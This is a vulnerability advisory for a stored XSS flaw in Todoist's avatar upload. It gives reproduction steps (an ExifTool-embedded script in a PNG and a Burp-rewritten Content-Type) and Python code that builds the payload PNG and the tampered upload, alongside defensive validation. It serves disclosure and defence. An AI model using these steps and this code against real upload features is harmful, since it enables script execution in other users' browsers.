Todoist Stored Cross-Site Scripting Vulnerability in Avatar Upload Feature

Vulnerability

A stored cross-site scripting vulnerability has been identified in Todoist version 8484. The issue arises in the avatar upload functionality, where the application neither checks the declared MIME type of an uploaded file against its actual content nor strips image metadata before storing it. An attacker can therefore upload a PNG whose metadata carries a script payload while declaring the file's Content-Type as text/html. The script does not run because the image is decoded (image decoding never executes script); it runs because the stored file is later served back to a browser as HTML, at which point the embedded JavaScript executes.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting: the injected script executes in the browser of any user who loads the stored file, within the origin it is served from and with that user's session. The practical impact therefore depends on whether avatars are served from the application's own origin; if they are served from a separate origin, the script runs in that origin and cannot directly read the application's session.

Reproduction

To reproduce this vulnerability, start with any PNG image. Use ExifTool to write a script payload into the image's Comment field; ExifTool stores this in a PNG tEXt chunk next to the image data, and the payload survives the upload because the application does not strip metadata. Submit the file through the avatar (or file) upload function with the request intercepted in a tool such as Burp Suite, and change the Content-Type of the file part from 'image/png' to 'text/html' before forwarding it. The application accepts the upload without comparing the declared type against the file's bytes, and when the stored file is requested it is returned with the attacker-supplied type, so the browser treats it as HTML and the embedded JavaScript executes.
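As an added worked example (not code from the advisory or from Todoist), the following Python shows both sides of the reproduction above. The attacker side builds a valid PNG whose Comment entry lives in a tEXt chunk, which is the same field that `exiftool -Comment='...' avatar.png` writes, and wraps it in a multipart body with the file part's Content-Type rewritten from image/png to text/html, as one would do in Burp. The defender side shows the handling that would have blocked the issue: the type is decided from the file bytes rather than the client's header, text chunks are stripped before storage, and the stored file is pinned to image/png with nosniff when served. The payload string, the form field name `avatar`, the boundary, and the response header set are assumptions chosen for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Constructed test payload for this example; the advisory does not give one.
PAYLOAD = "<script>alert(document.domain)</script>"
# PNG chunk types that carry free-form text metadata (Comment lives in tEXt).
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, rejecting a bad signature, a
    truncated chunk or a CRC mismatch."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG: bad signature")
    pos = 8
    while pos < len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        end = pos + 12 + length
        if end > len(png):
            raise ValueError("truncated chunk")
        ctype, data = png[pos + 4:pos + 8], png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[end - 4:end])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos = end
        if ctype == b"IEND":
            break


def build_png(comment: str) -> bytes:
    """Attacker side: a valid 1x1 PNG whose tEXt 'Comment' entry holds the
    payload, the same field that `exiftool -Comment='...' avatar.png` writes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB
    scanline = b"\x00" + b"\xff\x00\x00"                 # filter 0 + one red pixel
    return (PNG_SIG
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"tEXt", b"Comment\x00" + comment.encode("latin-1"))
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


def multipart_body(data: bytes, declared_type: str, boundary: str = "----example") -> bytes:
    """The multipart/form-data body the browser would send. `declared_type` is
    the per-part Content-Type that an intercepting proxy such as Burp lets you
    rewrite from image/png to text/html before the request reaches the server.
    The field name 'avatar' is an assumption for this example."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="avatar"; filename="avatar.png"\r\n'
            f"Content-Type: {declared_type}\r\n\r\n").encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def strip_text_chunks(png: bytes) -> bytes:
    """Defender side: rewrite the PNG keeping only non-text chunks, so no
    attacker-controlled metadata survives into the stored file."""
    return PNG_SIG + b"".join(_chunk(t, d) for t, d in iter_chunks(png)
                              if t not in TEXT_CHUNKS)


def accept_upload(declared_type: str, data: bytes):
    """Defender side: decide from the bytes, not the client's header, and pin
    the headers the stored file is served back with.
    Returns (accepted, reason, stored_bytes, response_headers)."""
    if data[:8] != PNG_SIG:
        return False, "content is not a PNG", None, {}
    if declared_type != "image/png":
        # A mismatch between declared type and content is treated as tampering.
        return False, f"declared type {declared_type!r} does not match content", None, {}
    try:
        stored = strip_text_chunks(data)
    except ValueError as exc:
        return False, f"malformed PNG: {exc}", None, {}
    headers = {                                   # assumed header set for serving
        "Content-Type": "image/png",              # derived from the bytes
        "X-Content-Type-Options": "nosniff",      # browser must not re-sniff
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return True, "ok", stored, headers


if __name__ == "__main__":
    png = build_png(PAYLOAD)
    print(multipart_body(png, "text/html")[:140])
    print(accept_upload("text/html", png)[:2])
    ok, why, stored, hdrs = accept_upload("image/png", png)
    print(ok, why, b"<script>" in stored, hdrs["Content-Type"])
```

Running the module prints the first bytes of the tampered upload, the rejection of the text/html part, and an accepted image/png upload whose stored bytes no longer contain the payload. The stripping step rebuilds the file from parsed chunks rather than searching for the payload string, so it also removes metadata the attacker might have placed in zTXt or iTXt chunks.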

Added: Sep 26, 2025, 3:57 PM
Updated: Sep 26, 2025, 4:23 PM

Vulnerability Rating

Custom Algorithm

  spread          0.0
  impact          1.7
  exploitability  6.3
  remediation     0.0
  relevance       0.6
  threat          6.4
  urgency         2.9
  incentive       0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.